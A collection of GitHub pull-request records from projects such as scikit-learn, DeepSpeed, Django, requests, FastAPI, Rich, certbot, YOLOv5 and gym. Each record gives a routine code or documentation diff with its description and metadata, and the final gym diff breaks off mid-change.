+++ b/doc/developers/advanced_installation.rst
@@ -434,7 +434,7 @@ Install ICC, packaged under the name ``intel-oneapi-icc``::
Before using ICC, you need to set up environment variables::
- source /opt/intel/inteloneapi/setvars.sh
+ source /opt/intel/oneapi/setvars.sh
Finally, you can build scikit-learn. For example on Linux x86_64::
|
It seems that Intel has renamed a file that made the travis cron-job fail as a result.
|
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/18730
|
2020-11-02T11:27:10Z
|
2020-11-02T15:37:34Z
|
2020-11-02T15:37:34Z
|
2020-11-02T15:37:40Z
| 710
|
scikit-learn/scikit-learn
| 45,928
|
Fix rnn flop profiler to compute flops instead of macs
|
diff --git a/deepspeed/profiling/flops_profiler/profiler.py b/deepspeed/profiling/flops_profiler/profiler.py
index 29d74c617ac9..38ab92ed8284 100644
--- a/deepspeed/profiling/flops_profiler/profiler.py
+++ b/deepspeed/profiling/flops_profiler/profiler.py
@@ -960,10 +960,11 @@ def _reload_tensor_methods():
def _rnn_flops(flops, rnn_module, w_ih, w_hh, input_size):
+ input_size, hidden_size = w_ih.shape
# matrix matrix mult ih state and internal state
- flops += w_ih.shape[0] * w_ih.shape[1]
+ flops += 2 * input_size * hidden_size - hidden_size
# matrix matrix mult hh state and internal state
- flops += w_hh.shape[0] * w_hh.shape[1]
+ flops += 2 * hidden_size * hidden_size - hidden_size
if isinstance(rnn_module, (nn.RNN, nn.RNNCell)):
# add both operations
flops += rnn_module.hidden_size
|
This MR is related to the issue I recently opened: https://github.com/microsoft/DeepSpeed/issues/3816
It implements the simple fix I proposed there, which simply computes FLOPs instead of MACs.
|
https://api.github.com/repos/microsoft/DeepSpeed/pulls/3833
|
2023-06-28T08:49:11Z
|
2023-07-06T15:57:46Z
|
2023-07-06T15:57:46Z
|
2023-07-06T15:57:46Z
| 266
|
microsoft/DeepSpeed
| 10,326
|
Fixed #28472 -- Optimized jQuery selector in actions.js
|
diff --git a/django/contrib/admin/static/admin/js/actions.js b/django/contrib/admin/static/admin/js/actions.js
index 7041701f271bf..0f435abcc307c 100644
--- a/django/contrib/admin/static/admin/js/actions.js
+++ b/django/contrib/admin/static/admin/js/actions.js
@@ -109,7 +109,7 @@
lastChecked = target;
updateCounter();
});
- $('form#changelist-form table#result_list tr').find('td:gt(0) :input').change(function() {
+ $('form#changelist-form table#result_list tr').on('change', 'td:gt(0) :input', function() {
list_editable_changed = true;
});
$('form#changelist-form button[name="index"]').click(function(event) {
diff --git a/django/contrib/admin/static/admin/js/actions.min.js b/django/contrib/admin/static/admin/js/actions.min.js
index a07b1fc07eae8..1b771fb608f2e 100644
--- a/django/contrib/admin/static/admin/js/actions.min.js
+++ b/django/contrib/admin/static/admin/js/actions.min.js
@@ -1,9 +1,6 @@
-var $jscomp={scope:{},findInternal:function(a,d,c){a instanceof String&&(a=String(a));for(var b=a.length,e=0;e<b;e++){var h=a[e];if(d.call(c,h,e,a))return{i:e,v:h}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?Object.defineProperty:function(a,d,c){if(c.get||c.set)throw new TypeError("ES3 does not support getters and setters.");a!=Array.prototype&&a!=Object.prototype&&(a[d]=c.value)};
-$jscomp.getGlobal=function(a){return"undefined"!=typeof window&&window===a?a:"undefined"!=typeof global&&null!=global?global:a};$jscomp.global=$jscomp.getGlobal(this);$jscomp.polyfill=function(a,d,c,b){if(d){c=$jscomp.global;a=a.split(".");for(b=0;b<a.length-1;b++){var e=a[b];e in c||(c[e]={});c=c[e]}a=a[a.length-1];b=c[a];d=d(b);d!=b&&null!=d&&$jscomp.defineProperty(c,a,{configurable:!0,writable:!0,value:d})}};
-$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,c){return $jscomp.findInternal(this,a,c).v}},"es6-impl","es3");
-(function(a){var d;a.fn.actions=function(c){var b=a.extend({},a.fn.actions.defaults,c),e=a(this),h=!1,l=function(){a(b.acrossClears).hide();a(b.acrossQuestions).show();a(b.allContainer).hide()},m=function(){a(b.acrossClears).show();a(b.acrossQuestions).hide();a(b.actionContainer).toggleClass(b.selectedClass);a(b.allContainer).show();a(b.counterContainer).hide()},n=function(){a(b.acrossClears).hide();a(b.acrossQuestions).hide();a(b.allContainer).hide();a(b.counterContainer).show()},p=function(){n();
-a(b.acrossInput).val(0);a(b.actionContainer).removeClass(b.selectedClass)},q=function(f){f?l():n();a(e).prop("checked",f).parent().parent().toggleClass(b.selectedClass,f)},k=function(){var f=a(e).filter(":checked").length,c=a(".action-counter").data("actionsIcnt");a(b.counterContainer).html(interpolate(ngettext("%(sel)s of %(cnt)s selected","%(sel)s of %(cnt)s selected",f),{sel:f,cnt:c},!0));a(b.allToggle).prop("checked",function(){var a;f===e.length?(a=!0,l()):(a=!1,p());return a})};a(b.counterContainer).show();
-a(this).filter(":checked").each(function(c){a(this).parent().parent().toggleClass(b.selectedClass);k();1===a(b.acrossInput).val()&&m()});a(b.allToggle).show().click(function(){q(a(this).prop("checked"));k()});a("a",b.acrossQuestions).click(function(c){c.preventDefault();a(b.acrossInput).val(1);m()});a("a",b.acrossClears).click(function(c){c.preventDefault();a(b.allToggle).prop("checked",!1);p();q(0);k()});d=null;a(e).click(function(c){c||(c=window.event);var g=c.target?c.target:c.srcElement;if(d&&
-a.data(d)!==a.data(g)&&!0===c.shiftKey){var f=!1;a(d).prop("checked",g.checked).parent().parent().toggleClass(b.selectedClass,g.checked);a(e).each(function(){if(a.data(this)===a.data(d)||a.data(this)===a.data(g))f=f?!1:!0;f&&a(this).prop("checked",g.checked).parent().parent().toggleClass(b.selectedClass,g.checked)})}a(g).parent().parent().toggleClass(b.selectedClass,g.checked);d=g;k()});a("form#changelist-form table#result_list tr").find("td:gt(0) :input").change(function(){h=!0});a('form#changelist-form button[name="index"]').click(function(a){if(h)return confirm(gettext("You have unsaved changes on individual editable fields. If you run an action, your unsaved changes will be lost."))});
-a('form#changelist-form input[name="_save"]').click(function(c){var d=!1;a("select option:selected",b.actionContainer).each(function(){a(this).val()&&(d=!0)});if(d)return h?confirm(gettext("You have selected an action, but you haven't saved your changes to individual fields yet. Please click OK to save. You'll need to re-run the action.")):confirm(gettext("You have selected an action, and you haven't made any changes on individual fields. You're probably looking for the Go button rather than the Save button."))})};
-a.fn.actions.defaults={actionContainer:"div.actions",counterContainer:"span.action-counter",allContainer:"div.actions span.all",acrossInput:"div.actions input.select-across",acrossQuestions:"div.actions span.question",acrossClears:"div.actions span.clear",allToggle:"#action-toggle",selectedClass:"selected"};a(document).ready(function(){var c=a("tr input.action-select");0<c.length&&c.actions()})})(django.jQuery);
+(function(a){var f;a.fn.actions=function(e){var b=a.extend({},a.fn.actions.defaults,e),g=a(this),k=!1,l=function(){a(b.acrossClears).hide();a(b.acrossQuestions).show();a(b.allContainer).hide()},m=function(){a(b.acrossClears).show();a(b.acrossQuestions).hide();a(b.actionContainer).toggleClass(b.selectedClass);a(b.allContainer).show();a(b.counterContainer).hide()},n=function(){a(b.acrossClears).hide();a(b.acrossQuestions).hide();a(b.allContainer).hide();a(b.counterContainer).show()},p=function(){n();
+a(b.acrossInput).val(0);a(b.actionContainer).removeClass(b.selectedClass)},q=function(c){c?l():n();a(g).prop("checked",c).parent().parent().toggleClass(b.selectedClass,c)},h=function(){var c=a(g).filter(":checked").length,d=a(".action-counter").data("actionsIcnt");a(b.counterContainer).html(interpolate(ngettext("%(sel)s of %(cnt)s selected","%(sel)s of %(cnt)s selected",c),{sel:c,cnt:d},!0));a(b.allToggle).prop("checked",function(){var a;c===g.length?(a=!0,l()):(a=!1,p());return a})};a(b.counterContainer).show();
+a(this).filter(":checked").each(function(c){a(this).parent().parent().toggleClass(b.selectedClass);h();1===a(b.acrossInput).val()&&m()});a(b.allToggle).show().click(function(){q(a(this).prop("checked"));h()});a("a",b.acrossQuestions).click(function(c){c.preventDefault();a(b.acrossInput).val(1);m()});a("a",b.acrossClears).click(function(c){c.preventDefault();a(b.allToggle).prop("checked",!1);p();q(0);h()});f=null;a(g).click(function(c){c||(c=window.event);var d=c.target?c.target:c.srcElement;if(f&&
+a.data(f)!==a.data(d)&&!0===c.shiftKey){var e=!1;a(f).prop("checked",d.checked).parent().parent().toggleClass(b.selectedClass,d.checked);a(g).each(function(){if(a.data(this)===a.data(f)||a.data(this)===a.data(d))e=e?!1:!0;e&&a(this).prop("checked",d.checked).parent().parent().toggleClass(b.selectedClass,d.checked)})}a(d).parent().parent().toggleClass(b.selectedClass,d.checked);f=d;h()});a("form#changelist-form table#result_list tr").on("change","td:gt(0) :input",function(){k=!0});a('form#changelist-form button[name="index"]').click(function(a){if(k)return confirm(gettext("You have unsaved changes on individual editable fields. If you run an action, your unsaved changes will be lost."))});
+a('form#changelist-form input[name="_save"]').click(function(c){var d=!1;a("select option:selected",b.actionContainer).each(function(){a(this).val()&&(d=!0)});if(d)return k?confirm(gettext("You have selected an action, but you haven't saved your changes to individual fields yet. Please click OK to save. You'll need to re-run the action.")):confirm(gettext("You have selected an action, and you haven't made any changes on individual fields. You're probably looking for the Go button rather than the Save button."))})};
+a.fn.actions.defaults={actionContainer:"div.actions",counterContainer:"span.action-counter",allContainer:"div.actions span.all",acrossInput:"div.actions input.select-across",acrossQuestions:"div.actions span.question",acrossClears:"div.actions span.clear",allToggle:"#action-toggle",selectedClass:"selected"};a(document).ready(function(){var e=a("tr input.action-select");0<e.length&&e.actions()})})(django.jQuery);
|
Refactored a selector in jQuery to use a single handler for the
'on change' event. This speeds up page loading time.
|
https://api.github.com/repos/django/django/pulls/8861
|
2017-08-07T14:53:34Z
|
2017-08-08T12:35:58Z
|
2017-08-08T12:35:58Z
|
2017-08-08T12:58:18Z
| 2,324
|
django/django
| 51,085
|
Remove snap-plugin reference from README
|
diff --git a/snap/local/README.md b/snap/local/README.md
index ea509b22975..62977f8c3ce 100644
--- a/snap/local/README.md
+++ b/snap/local/README.md
@@ -66,7 +66,7 @@ These steps need to be done once to set up your VM and do not need to be run aga
5. Add your current user to the lxd group and update your shell to have the new assignment by running `sudo usermod -a -G lxd ${USER} && newgrp lxd`.
6. Install snapcraft with `sudo snap install --classic snapcraft`.
7. `cd ~` (or any other directory where you want our source files to be)
- 8. Run `git clone git://github.com/certbot/certbot -b snap-plugin`
+ 8. Run `git clone git://github.com/certbot/certbot`
9. `cd certbot`
### Build the Snaps
|
The `snap-plugin` branch doesn't exist anymore.
|
https://api.github.com/repos/certbot/certbot/pulls/8101
|
2020-06-22T22:30:49Z
|
2020-06-22T22:49:19Z
|
2020-06-22T22:49:19Z
|
2020-06-22T22:49:26Z
| 227
|
certbot/certbot
| 1,411
|
3780: Lazy load idna library
|
diff --git a/AUTHORS.rst b/AUTHORS.rst
index c05befce32..cc9e75f3bd 100644
--- a/AUTHORS.rst
+++ b/AUTHORS.rst
@@ -175,3 +175,4 @@ Patches and Suggestions
- Hussain Tamboli <[email protected]> (`@hussaintamboli <https://github.com/hussaintamboli>`_)
- Casey Davidson (`@davidsoncasey <https://github.com/davidsoncasey>`_)
- Andrii Soldatenko (`@a_soldatenko <https://github.com/andriisoldatenko>`_)
+- Moinuddin Quadri <[email protected]> (`@moin18 <https://github.com/moin18>`_)
diff --git a/requests/models.py b/requests/models.py
index 91555b58f8..d1a9c8687d 100644
--- a/requests/models.py
+++ b/requests/models.py
@@ -9,6 +9,7 @@
import collections
import datetime
+import sys
# Import encoding now, to avoid implicit import later.
# Implicit import within threads may cause LookupError when standard library is in a ZIP,
@@ -21,7 +22,6 @@
from .auth import HTTPBasicAuth
from .cookies import cookiejar_from_dict, get_cookie_header, _copy_cookie_jar
-from .packages import idna
from .packages.urllib3.fields import RequestField
from .packages.urllib3.filepost import encode_multipart_formdata
from .packages.urllib3.util import parse_url
@@ -331,6 +331,22 @@ def prepare_method(self, method):
if self.method is not None:
self.method = to_native_string(self.method.upper())
+ @staticmethod
+ def _get_idna_encoded_host(host):
+ try:
+ from .packages import idna
+ except ImportError:
+ # tolerate the possibility of downstream repackagers unvendoring `requests`
+ # For more information, read: packages/__init__.py
+ import idna
+ sys.modules['requests.packages.idna'] = idna
+
+ try:
+ host = idna.encode(host, uts46=True).decode('utf-8')
+ except idna.IDNAError:
+ raise UnicodeError
+ return host
+
def prepare_url(self, url, params):
"""Prepares the given HTTP URL."""
#: Accept objects that have string representations.
@@ -368,17 +384,17 @@ def prepare_url(self, url, params):
if not host:
raise InvalidURL("Invalid URL %r: No host supplied" % url)
- # In general, we want to try IDNA encoding every hostname, as that
- # allows users to automatically get the correct behaviour. However,
- # we’re quite strict about IDNA encoding, so certain valid hostnames
- # may fail to encode. On failure, we verify the hostname meets a
- # minimum standard of only containing ASCII characters, and not starting
- # with a wildcard (*), before allowing the unencoded hostname through.
- try:
- host = idna.encode(host, uts46=True).decode('utf-8')
- except (UnicodeError, idna.IDNAError):
- if not unicode_is_ascii(host) or host.startswith(u'*'):
+ # In general, we want to try IDNA encoding the hostname if the string contains
+ # non-ASCII characters. This allows users to automatically get the correct IDNA
+ # behaviour. For strings containing only ASCII characters, we need to also verify
+ # it doesn't start with a wildcard (*), before allowing the unencoded hostname.
+ if not unicode_is_ascii(host):
+ try:
+ host = self._get_idna_encoded_host(host)
+ except UnicodeError:
raise InvalidURL('URL has an invalid label.')
+ elif host.startswith(u'*'):
+ raise InvalidURL('URL has an invalid label.')
# Carefully reconstruct the network location
netloc = auth or ''
diff --git a/requests/packages/__init__.py b/requests/packages/__init__.py
index 4077265e97..971c2ad024 100644
--- a/requests/packages/__init__.py
+++ b/requests/packages/__init__.py
@@ -34,9 +34,3 @@
except ImportError:
import chardet
sys.modules['%s.chardet' % __name__] = chardet
-
-try:
- from . import idna
-except ImportError:
- import idna
- sys.modules['%s.idna' % __name__] = idna
|
Changes based on comment from previous Pull Request: https://github.com/kennethreitz/requests/pull/3787
Fix for issue: https://github.com/kennethreitz/requests/issues/3780
|
https://api.github.com/repos/psf/requests/pulls/3789
|
2016-12-23T17:21:43Z
|
2017-01-19T09:19:00Z
|
2017-01-19T09:19:00Z
|
2021-09-07T00:06:42Z
| 1,045
|
psf/requests
| 32,761
|
⬆️ Upgrade MkDocs and MkDocs Material
|
diff --git a/requirements-docs.txt b/requirements-docs.txt
index e9d0567ed76f4..211212fba986c 100644
--- a/requirements-docs.txt
+++ b/requirements-docs.txt
@@ -1,6 +1,6 @@
-e .
-mkdocs >=1.1.2,<2.0.0
-mkdocs-material >=8.1.4,<9.0.0
+mkdocs==1.4.3
+mkdocs-material==9.1.16
mdx-include >=1.4.1,<2.0.0
mkdocs-markdownextradata-plugin >=0.1.7,<0.3.0
typer-cli >=0.0.13,<0.0.14
|
⬆️ Upgrade MkDocs and MkDocs Material
|
https://api.github.com/repos/tiangolo/fastapi/pulls/9729
|
2023-06-23T17:56:20Z
|
2023-06-23T18:16:42Z
|
2023-06-23T18:16:42Z
|
2023-06-23T18:16:42Z
| 174
|
tiangolo/fastapi
| 23,187
|
Update padding.rst
|
diff --git a/docs/source/padding.rst b/docs/source/padding.rst
index a72dcbf9d..0c0225b37 100644
--- a/docs/source/padding.rst
+++ b/docs/source/padding.rst
@@ -17,7 +17,7 @@ For example, the following displays 2 blank lines above and below the text, and
test = Padding("Hello", (2, 4))
print(test)
-The Padding class can also accept a ``style`` argument which applies a style to the padding and contents, and an ``expand`` switch which can be set to False to prevent the padding from extending to the full with of the terminal. Here's an example which demonstrates both these arguments::
+The Padding class can also accept a ``style`` argument which applies a style to the padding and contents, and an ``expand`` switch which can be set to False to prevent the padding from extending to the full width of the terminal. Here's an example which demonstrates both these arguments::
from rich import print
from rich.padding import Padding
|
Typo
## Type of changes
- [ ] Bug fix
- [ ] New feature
- [X] Documentation / docstrings
- [ ] Tests
- [ ] Other
## Checklist
- [ ] I've run the latest [black](https://github.com/psf/black) with default args on new code.
- [] I've updated CHANGELOG.md and CONTRIBUTORS.md where appropriate.
- [ ] I've added tests for new code.
- [X] I accept that @willmcgugan may be pedantic in the code review.
## Description
Fixed a typo
|
https://api.github.com/repos/Textualize/rich/pulls/1189
|
2021-04-25T06:12:02Z
|
2021-04-25T14:05:25Z
|
2021-04-25T14:05:25Z
|
2021-04-25T14:05:31Z
| 231
|
Textualize/rich
| 48,609
|
Bump lycheeverse/lychee-action from 1.6.1 to 1.7.0
|
diff --git a/.github/workflows/links.yml b/.github/workflows/links.yml
index f6403720166..a5413318030 100644
--- a/.github/workflows/links.yml
+++ b/.github/workflows/links.yml
@@ -19,7 +19,7 @@ jobs:
- uses: actions/checkout@v3
- name: Test Markdown and HTML links
- uses: lycheeverse/[email protected]
+ uses: lycheeverse/[email protected]
with:
fail: true
# accept 429(Instagram, 'too many requests'), 999(LinkedIn, 'unknown status code'), Timeout(Twitter)
@@ -29,7 +29,7 @@ jobs:
- name: Test Markdown, HTML, YAML, Python and Notebook links
if: github.event_name == 'workflow_dispatch'
- uses: lycheeverse/[email protected]
+ uses: lycheeverse/[email protected]
with:
fail: true
# accept 429(Instagram, 'too many requests'), 999(LinkedIn, 'unknown status code'), Timeout(Twitter)
|
Bumps [lycheeverse/lychee-action](https://github.com/lycheeverse/lychee-action) from 1.6.1 to 1.7.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/lycheeverse/lychee-action/releases">lycheeverse/lychee-action's releases</a>.</em></p>
<blockquote>
<h2>Version 1.7.0</h2>
<h2>What's Changed</h2>
<ul>
<li>Fix three typos in README by <a href="https://github.com/phieri"><code>@phieri</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/184">lycheeverse/lychee-action#184</a></li>
<li>CI: Automatic vX tag update workflow by <a href="https://github.com/tooomm"><code>@tooomm</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/185">lycheeverse/lychee-action#185</a></li>
<li>Format arguments in CI pipeline by <a href="https://github.com/mre"><code>@mre</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/186">lycheeverse/lychee-action#186</a></li>
<li>Test lychee cache by <a href="https://github.com/mre"><code>@mre</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/187">lycheeverse/lychee-action#187</a></li>
<li>Cleanup tar archive; make installation more robst by <a href="https://github.com/mre"><code>@mre</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/189">lycheeverse/lychee-action#189</a></li>
<li>Readme: Add info about split up cache steps by <a href="https://github.com/tooomm"><code>@tooomm</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/190">lycheeverse/lychee-action#190</a></li>
<li>bump lychee version by <a href="https://github.com/mre"><code>@mre</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/192">lycheeverse/lychee-action#192</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a href="https://github.com/phieri"><code>@phieri</code></a> made their first contribution in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/184">lycheeverse/lychee-action#184</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a href="https://github.com/lycheeverse/lychee-action/compare/v1.6.1...v1.7.0">https://github.com/lycheeverse/lychee-action/compare/v1.6.1...v1.7.0</a></p>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/97189f2c0a3c8b0cb0e704fd4e878af6e5e2b2c5"><code>97189f2</code></a> bump version</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/01d72a032635cc56bf23e901b9d5fb3272419ca1"><code>01d72a0</code></a> update to 1.7.0</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/7dedc2e65d226a92c5037f28f9587ac990e43803"><code>7dedc2e</code></a> bump lychee version (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/192">#192</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/a12cbb3a4921899299dcc58a6136bcdd0d1fbf1c"><code>a12cbb3</code></a> add info about split up cache steps (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/190">#190</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/053a19c5553b4658ddaf67cb19fc9634f178a430"><code>053a19c</code></a> Update FUNDING.yml</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/249abafe5e45bd0bd7b16d9f57791044a22881eb"><code>249abaf</code></a> Cleanup tar archive; make installation more robst (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/189">#189</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/8aac478accffb57894c1d3ac2ffdaeb54c1fd5b5"><code>8aac478</code></a> Test lychee cache (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/187">#187</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/a4ca7a733dd317f546cad0b3b9a56a6ce728e921"><code>a4ca7a7</code></a> Format arguments (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/186">#186</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/ec141401078393f1f68edbcef205b6db1501fe48"><code>ec14140</code></a> CI: Automatic vX tag update workflow (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/185">#185</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/c90955041c1be4e02158e386ba2b8d9c376160ee"><code>c909550</code></a> Fix three typos in README (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/184">#184</a>)</li>
<li>See full diff in <a href="https://github.com/lycheeverse/lychee-action/compare/v1.6.1...v1.7.0">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details>
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub>
### 🌟 Summary
Updated link checker GitHub Action to latest version.
### 📊 Key Changes
- Upgraded `lycheeverse/lychee-action` from `v1.6.1` to `v1.7.0` in the workflow file.
### 🎯 Purpose & Impact
- 🚀 **Purpose**: Ensure the link-checking action used in the repository's workflows is up-to-date with the latest features and fixes.
- ✨ **Impact**: Improved link-checking reliability and performance for the project's documentation, potentially leading to a better maintenance process and user experience.
|
https://api.github.com/repos/ultralytics/yolov5/pulls/11427
|
2023-04-24T04:58:41Z
|
2023-04-24T15:14:32Z
|
2023-04-24T15:14:32Z
|
2024-01-19T02:06:21Z
| 284
|
ultralytics/yolov5
| 25,378
|
✨ Add allow disabling `redirect_slashes` at the FastAPI app level
|
diff --git a/fastapi/applications.py b/fastapi/applications.py
index 298aca921d70c..9b161c5ec832f 100644
--- a/fastapi/applications.py
+++ b/fastapi/applications.py
@@ -62,6 +62,7 @@ def __init__(
servers: Optional[List[Dict[str, Union[str, Any]]]] = None,
dependencies: Optional[Sequence[Depends]] = None,
default_response_class: Type[Response] = Default(JSONResponse),
+ redirect_slashes: bool = True,
docs_url: Optional[str] = "/docs",
redoc_url: Optional[str] = "/redoc",
swagger_ui_oauth2_redirect_url: Optional[str] = "/docs/oauth2-redirect",
@@ -127,6 +128,7 @@ def __init__(
self.dependency_overrides: Dict[Callable[..., Any], Callable[..., Any]] = {}
self.router: routing.APIRouter = routing.APIRouter(
routes=routes,
+ redirect_slashes=redirect_slashes,
dependency_overrides_provider=self,
on_startup=on_startup,
on_shutdown=on_shutdown,
diff --git a/tests/test_router_redirect_slashes.py b/tests/test_router_redirect_slashes.py
new file mode 100644
index 0000000000000..086665c040ab4
--- /dev/null
+++ b/tests/test_router_redirect_slashes.py
@@ -0,0 +1,40 @@
+from fastapi import APIRouter, FastAPI
+from fastapi.testclient import TestClient
+
+
+def test_redirect_slashes_enabled():
+ app = FastAPI()
+ router = APIRouter()
+
+ @router.get("/hello/")
+ def hello_page() -> str:
+ return "Hello, World!"
+
+ app.include_router(router)
+
+ client = TestClient(app)
+
+ response = client.get("/hello/", follow_redirects=False)
+ assert response.status_code == 200
+
+ response = client.get("/hello", follow_redirects=False)
+ assert response.status_code == 307
+
+
+def test_redirect_slashes_disabled():
+ app = FastAPI(redirect_slashes=False)
+ router = APIRouter()
+
+ @router.get("/hello/")
+ def hello_page() -> str:
+ return "Hello, World!"
+
+ app.include_router(router)
+
+ client = TestClient(app)
+
+ response = client.get("/hello/", follow_redirects=False)
+ assert response.status_code == 200
+
+ response = client.get("/hello", follow_redirects=False)
+ assert response.status_code == 404
|
Right now `redirect_slashes` parameter in sub routers created with `APIRouter` ignored, because only main router's `redirect_slashes` inside FastAPI class is taken into account. FastAPI class creates new router without `redirect_slashes` argument and that's why router always uses default value `redirect_slashes=True` and always redirects on trailing slashes.
https://github.com/tiangolo/fastapi/blob/master/fastapi/applications.py#L69
Here is how to reproduce this problem
```python
from fastapi import FastAPI
from fastapi.routing import APIRouter
router = APIRouter(redirect_slashes=False)
@router.get('/hello/')
def hello_page() -> str:
return 'Hello, World!'
app = FastAPI()
app.include_router(router)
```
And if you request page `http://127.0.0.1:8080/hello` (without trailing slash) you will be redirected even with `redirect_slashes=False`
```bash
uvicorn main:app
INFO: Started server process [96046]
INFO: Waiting for application startup.
INFO: Application startup complete.
INFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)
INFO: 127.0.0.1:57330 - "GET /hello HTTP/1.1" 307 Temporary Redirect
INFO: 127.0.0.1:57330 - "GET /hello/ HTTP/1.1" 200 OK
```
I added `redirect_slashes` to `__init__` method of FastAPI class and passed it to router's constructor.
That way I can change trailing slashes redirect behaviour globally for application instance.
|
https://api.github.com/repos/tiangolo/fastapi/pulls/3432
|
2021-06-29T19:11:10Z
|
2023-06-22T10:37:51Z
|
2023-06-22T10:37:51Z
|
2023-06-22T10:37:52Z
| 574
|
tiangolo/fastapi
| 23,373
|
Py36+ syntax in gym/*.py
|
diff --git a/gym/core.py b/gym/core.py
index ae7b32c3557..7b316b1cea0 100644
--- a/gym/core.py
+++ b/gym/core.py
@@ -5,7 +5,7 @@
from gym.utils import closer
-class Env(object):
+class Env:
"""The main OpenAI Gym class. It encapsulates an environment with
arbitrary behind-the-scenes dynamics. An environment can be
partially or fully observed.
@@ -149,9 +149,9 @@ def unwrapped(self):
def __str__(self):
if self.spec is None:
- return "<{} instance>".format(type(self).__name__)
+ return f"<{type(self).__name__} instance>"
else:
- return "<{}<{}>>".format(type(self).__name__, self.spec.id)
+ return f"<{type(self).__name__}<{self.spec.id}>>"
def __enter__(self):
"""Support with-statement for the environment."""
@@ -232,9 +232,7 @@ def __init__(self, env):
def __getattr__(self, name):
if name.startswith("_"):
- raise AttributeError(
- "attempted to get missing private attribute '{}'".format(name)
- )
+ raise AttributeError(f"attempted to get missing private attribute '{name}'")
return getattr(self.env, name)
@property
@@ -304,7 +302,7 @@ def compute_reward(self, achieved_goal, desired_goal, info):
return self.env.compute_reward(achieved_goal, desired_goal, info)
def __str__(self):
- return "<{}{}>".format(type(self).__name__, self.env)
+ return f"<{type(self).__name__}{self.env}>"
def __repr__(self):
return str(self)
diff --git a/gym/error.py b/gym/error.py
index 5884e5911b4..6829ea62638 100644
--- a/gym/error.py
+++ b/gym/error.py
@@ -96,7 +96,7 @@ def __init__(
json_body=None,
headers=None,
):
- super(APIError, self).__init__(message)
+ super().__init__(message)
if http_body and hasattr(http_body, "decode"):
try:
@@ -117,7 +117,7 @@ def __init__(
def __unicode__(self):
if self.request_id is not None:
msg = self._message or "<empty message>"
- return u"Request {0}: {1}".format(self.request_id, msg)
+ return f"Request {self.request_id}: {msg}"
else:
return self._message
@@ -142,9 +142,7 @@ def __init__(
json_body=None,
headers=None,
):
- super(InvalidRequestError, self).__init__(
- message, http_body, http_status, json_body, headers
- )
+ super().__init__(message, http_body, http_status, json_body, headers)
self.param = param
@@ -194,7 +192,7 @@ class AlreadyPendingCallError(Exception):
"""
def __init__(self, message, name):
- super(AlreadyPendingCallError, self).__init__(message)
+ super().__init__(message)
self.name = name
@@ -205,7 +203,7 @@ class NoAsyncCallError(Exception):
"""
def __init__(self, message, name):
- super(NoAsyncCallError, self).__init__(message)
+ super().__init__(message)
self.name = name
diff --git a/gym/logger.py b/gym/logger.py
index 89ee21fe3f1..a519a48e5c9 100644
--- a/gym/logger.py
+++ b/gym/logger.py
@@ -22,18 +22,18 @@ def set_level(level):
def debug(msg, *args):
if MIN_LEVEL <= DEBUG:
- print("%s: %s" % ("DEBUG", msg % args), file=sys.stderr)
+ print(f"DEBUG: {msg % args}", file=sys.stderr)
def info(msg, *args):
if MIN_LEVEL <= INFO:
- print("%s: %s" % ("INFO", msg % args), file=sys.stderr)
+ print(f"INFO: {msg % args}", file=sys.stderr)
def warn(msg, *args, category=None, stacklevel=1):
if MIN_LEVEL <= WARN:
warnings.warn(
- colorize("%s: %s" % ("WARN", msg % args), "yellow"),
+ colorize(f"WARN: {msg % args}", "yellow"),
category=category,
